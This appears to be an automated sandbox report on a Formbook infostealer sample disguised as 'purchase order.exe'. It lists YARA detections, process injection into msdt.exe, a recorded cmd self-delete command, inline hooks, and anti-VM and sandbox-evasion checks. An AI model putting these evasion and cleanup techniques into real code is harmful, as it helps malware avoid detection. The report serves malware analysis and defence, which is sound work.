            Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/3
            Source: C:\Users\user\Desktop\purchase order.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\purchase order.exe.log
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_01
            Source: purchase order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\purchase order.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\purchase order.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: purchase order.exeVirustotal: Detection: 28%
            Source: purchase order.exeReversingLabs: Detection: 19%
            Source: unknownProcess created: C:\Users\user\Desktop\purchase order.exe 'C:\Users\user\Desktop\purchase order.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
            Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe'
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\purchase order.exeProcess created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exe
            Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe'
            Source: C:\Users\user\Desktop\purchase order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
            Source: C:\Users\user\Desktop\purchase order.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: purchase order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: purchase order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.377355938.0000000007BA0000.00000002.00000001.sdmp
            Source: Binary string: msdt.pdbGCTL source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: purchase order.exe, 00000002.00000002.395144348.000000000189F000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: purchase order.exe, msdt.exe
            Source: Binary string: msdt.pdb source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.377355938.0000000007BA0000.00000002.00000001.sdmp
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_063A5252 push ecx; iretd 0_2_063A5253
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_063A2B1C push es; iretd 0_2_063A2B22
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 0_2_06A2E18D push FFFFFF8Bh; iretd 0_2_06A2E18F
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041D075 push eax; ret 2_2_0041D0C8
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041C802 push esi; iretd 2_2_0041C803
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041D0C2 push eax; ret 2_2_0041D0C8
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041D0CB push eax; ret 2_2_0041D132
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041E172 pushfd ; ret 2_2_0041E174
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041D12C push eax; ret 2_2_0041D132
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_004182CC push cs; retf 2_2_004182CE
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041E4F5 push dword ptr [537421FAh]; ret 2_2_0041E515
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00419C92 pushfd ; iretd 2_2_00419C98
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0041674D push 8EAE14C8h; iretd 2_2_00416753
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_004167AE push C6E9D42Ah; ret 2_2_004167C2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017FD0D1 push ecx; ret 2_2_017FD0E4
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048AD0D1 push ecx; ret 5_2_048AD0E4
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D075 push eax; ret 5_2_0063D0C8
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063C802 push esi; iretd 5_2_0063C803
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D0C2 push eax; ret 5_2_0063D0C8
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D0CB push eax; ret 5_2_0063D132
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063E172 pushfd ; ret 5_2_0063E174
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063D12C push eax; ret 5_2_0063D132
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_006382CC push cs; retf 5_2_006382CE
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063E4F5 push dword ptr [537421FAh]; ret 5_2_0063E515
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_00639C92 pushfd ; iretd 5_2_00639C98
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0063674D push 8EAE14C8h; iretd 5_2_00636753
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_006367AE push C6E9D42Ah; ret 5_2_006367C2
            Source: initial sampleStatic PE information: section name: .text entropy: 7.23319521913

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEE
            Source: C:\Users\user\Desktop\purchase order.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Yara detected AntiVM_3
            Source: Yara matchFile source: 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: purchase order.exe PID: 3900, type: MEMORY
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\purchase order.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\purchase order.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\purchase order.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000006298E4 second address: 00000000006298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000000629B4E second address: 0000000000629B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\purchase order.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
            Source: C:\Users\user\Desktop\purchase order.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\purchase order.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\purchase order.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
            Source: C:\Users\user\Desktop\purchase order.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
            Source: C:\Users\user\Desktop\purchase order.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\purchase order.exe TID: 5016Thread sleep time: -49972s >= -30000s
            Source: C:\Users\user\Desktop\purchase order.exe TID: 4456Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 7048Thread sleep time: -64000s >= -30000s
            Source: C:\Windows\explorer.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
            Source: explorer.exe, 00000003.00000000.378092448.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000003.00000000.378015974.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
            Source: explorer.exe, 00000003.00000000.374586186.0000000006410000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000002.612924741.00000000062E0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
            Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: VMWARE
            Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000003.00000000.381193325.000000000D484000.00000004.00000001.sdmp Binary or memory string: 8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: purchase order.exe, 00000000.00000002.355593298.0000000002F08000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000003.00000000.378386869.0000000008540000.00000004.00000001.sdmp Binary or memory string: c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&-
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: vmware
            Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.378015974.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000003.00000000.377852959.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
            Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000003.00000000.377852959.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000003.00000000.378092448.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
            Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: explorer.exe, 00000003.00000000.357823561.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
            Source: C:\Users\user\Desktop\purchase order.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\purchase order.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00409A80 rdtsc 2_2_00409A80
            Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0040ACC0 LdrLoadDll,2_2_0040ACC0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187740D mov eax, dword ptr fs:[00000030h]2_2_0187740D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187740D mov eax, dword ptr fs:[00000030h]2_2_0187740D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187740D mov eax, dword ptr fs:[00000030h]2_2_0187740D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183C450 mov eax, dword ptr fs:[00000030h]2_2_0183C450
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183C450 mov eax, dword ptr fs:[00000030h]2_2_0183C450
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B849B mov eax, dword ptr fs:[00000030h]2_2_017B849B
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01827794 mov eax, dword ptr fs:[00000030h]2_2_01827794
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01827794 mov eax, dword ptr fs:[00000030h]2_2_01827794
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01827794 mov eax, dword ptr fs:[00000030h]2_2_01827794
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BFF60 mov eax, dword ptr fs:[00000030h]2_2_017BFF60
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BEF40 mov eax, dword ptr fs:[00000030h]2_2_017BEF40
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DE730 mov eax, dword ptr fs:[00000030h]2_2_017DE730
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A4F2E mov eax, dword ptr fs:[00000030h]2_2_017A4F2E
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A4F2E mov eax, dword ptr fs:[00000030h]2_2_017A4F2E
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CF716 mov eax, dword ptr fs:[00000030h]2_2_017CF716
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DA70E mov eax, dword ptr fs:[00000030h]2_2_017DA70E
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DA70E mov eax, dword ptr fs:[00000030h]2_2_017DA70E
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187070D mov eax, dword ptr fs:[00000030h]2_2_0187070D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0187070D mov eax, dword ptr fs:[00000030h]2_2_0187070D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E37F5 mov eax, dword ptr fs:[00000030h]2_2_017E37F5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183FF10 mov eax, dword ptr fs:[00000030h]2_2_0183FF10
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183FF10 mov eax, dword ptr fs:[00000030h]2_2_0183FF10
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01878F6A mov eax, dword ptr fs:[00000030h]2_2_01878F6A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B8794 mov eax, dword ptr fs:[00000030h]2_2_017B8794
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183FE87 mov eax, dword ptr fs:[00000030h]2_2_0183FE87
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h]2_2_017CAE73
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h]2_2_017CAE73
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h]2_2_017CAE73
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h]2_2_017CAE73
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CAE73 mov eax, dword ptr fs:[00000030h]2_2_017CAE73
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B766D mov eax, dword ptr fs:[00000030h]2_2_017B766D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01870EA5 mov eax, dword ptr fs:[00000030h]2_2_01870EA5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01870EA5 mov eax, dword ptr fs:[00000030h]2_2_01870EA5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01870EA5 mov eax, dword ptr fs:[00000030h]2_2_01870EA5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018246A7 mov eax, dword ptr fs:[00000030h]2_2_018246A7
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B7E41 mov eax, dword ptr fs:[00000030h]2_2_017B7E41
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0185FEC0 mov eax, dword ptr fs:[00000030h]2_2_0185FEC0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01878ED6 mov eax, dword ptr fs:[00000030h]2_2_01878ED6
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AE620 mov eax, dword ptr fs:[00000030h]2_2_017AE620
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DA61C mov eax, dword ptr fs:[00000030h]2_2_017DA61C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DA61C mov eax, dword ptr fs:[00000030h]2_2_017DA61C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AC600 mov eax, dword ptr fs:[00000030h]2_2_017AC600
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AC600 mov eax, dword ptr fs:[00000030h]2_2_017AC600
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AC600 mov eax, dword ptr fs:[00000030h]2_2_017AC600
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D8E00 mov eax, dword ptr fs:[00000030h]2_2_017D8E00
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01861608 mov eax, dword ptr fs:[00000030h]2_2_01861608
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B76E2 mov eax, dword ptr fs:[00000030h]2_2_017B76E2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D16E0 mov ecx, dword ptr fs:[00000030h]2_2_017D16E0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D36CC mov eax, dword ptr fs:[00000030h]2_2_017D36CC
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E8EC7 mov eax, dword ptr fs:[00000030h]2_2_017E8EC7
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0185FE3F mov eax, dword ptr fs:[00000030h]2_2_0185FE3F
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186AE44 mov eax, dword ptr fs:[00000030h]2_2_0186AE44
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186AE44 mov eax, dword ptr fs:[00000030h]2_2_0186AE44
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04859100 mov eax, dword ptr fs:[00000030h]5_2_04859100
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04859100 mov eax, dword ptr fs:[00000030h]5_2_04859100
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04874120 mov eax, dword ptr fs:[00000030h]5_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04874120 mov eax, dword ptr fs:[00000030h]5_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04874120 mov eax, dword ptr fs:[00000030h]5_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04874120 mov eax, dword ptr fs:[00000030h]5_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04874120 mov ecx, dword ptr fs:[00000030h]5_2_04874120
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488513A mov eax, dword ptr fs:[00000030h]5_2_0488513A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488513A mov eax, dword ptr fs:[00000030h]5_2_0488513A
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487B944 mov eax, dword ptr fs:[00000030h]5_2_0487B944
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0487B944 mov eax, dword ptr fs:[00000030h]5_2_0487B944
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485C962 mov eax, dword ptr fs:[00000030h]5_2_0485C962
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485B171 mov eax, dword ptr fs:[00000030h]5_2_0485B171
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0485B171 mov eax, dword ptr fs:[00000030h]5_2_0485B171
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488D294 mov eax, dword ptr fs:[00000030h]5_2_0488D294
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488D294 mov eax, dword ptr fs:[00000030h]5_2_0488D294
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h]5_2_048552A5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h]5_2_048552A5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h]5_2_048552A5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h]5_2_048552A5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_048552A5 mov eax, dword ptr fs:[00000030h]5_2_048552A5
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486AAB0 mov eax, dword ptr fs:[00000030h]5_2_0486AAB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0486AAB0 mov eax, dword ptr fs:[00000030h]5_2_0486AAB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0488FAB0 mov eax, dword ptr fs:[00000030h]5_2_0488FAB0
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04882ACB mov eax, dword ptr fs:[00000030h]5_2_04882ACB
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04882AE4 mov eax, dword ptr fs:[00000030h]5_2_04882AE4
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491AA16 mov eax, dword ptr fs:[00000030h]5_2_0491AA16
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_0491AA16 mov eax, dword ptr fs:[00000030h]5_2_0491AA16
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 5_2_04868A0A mov eax, dword ptr fs:[00000030h]5_2_04868A0A
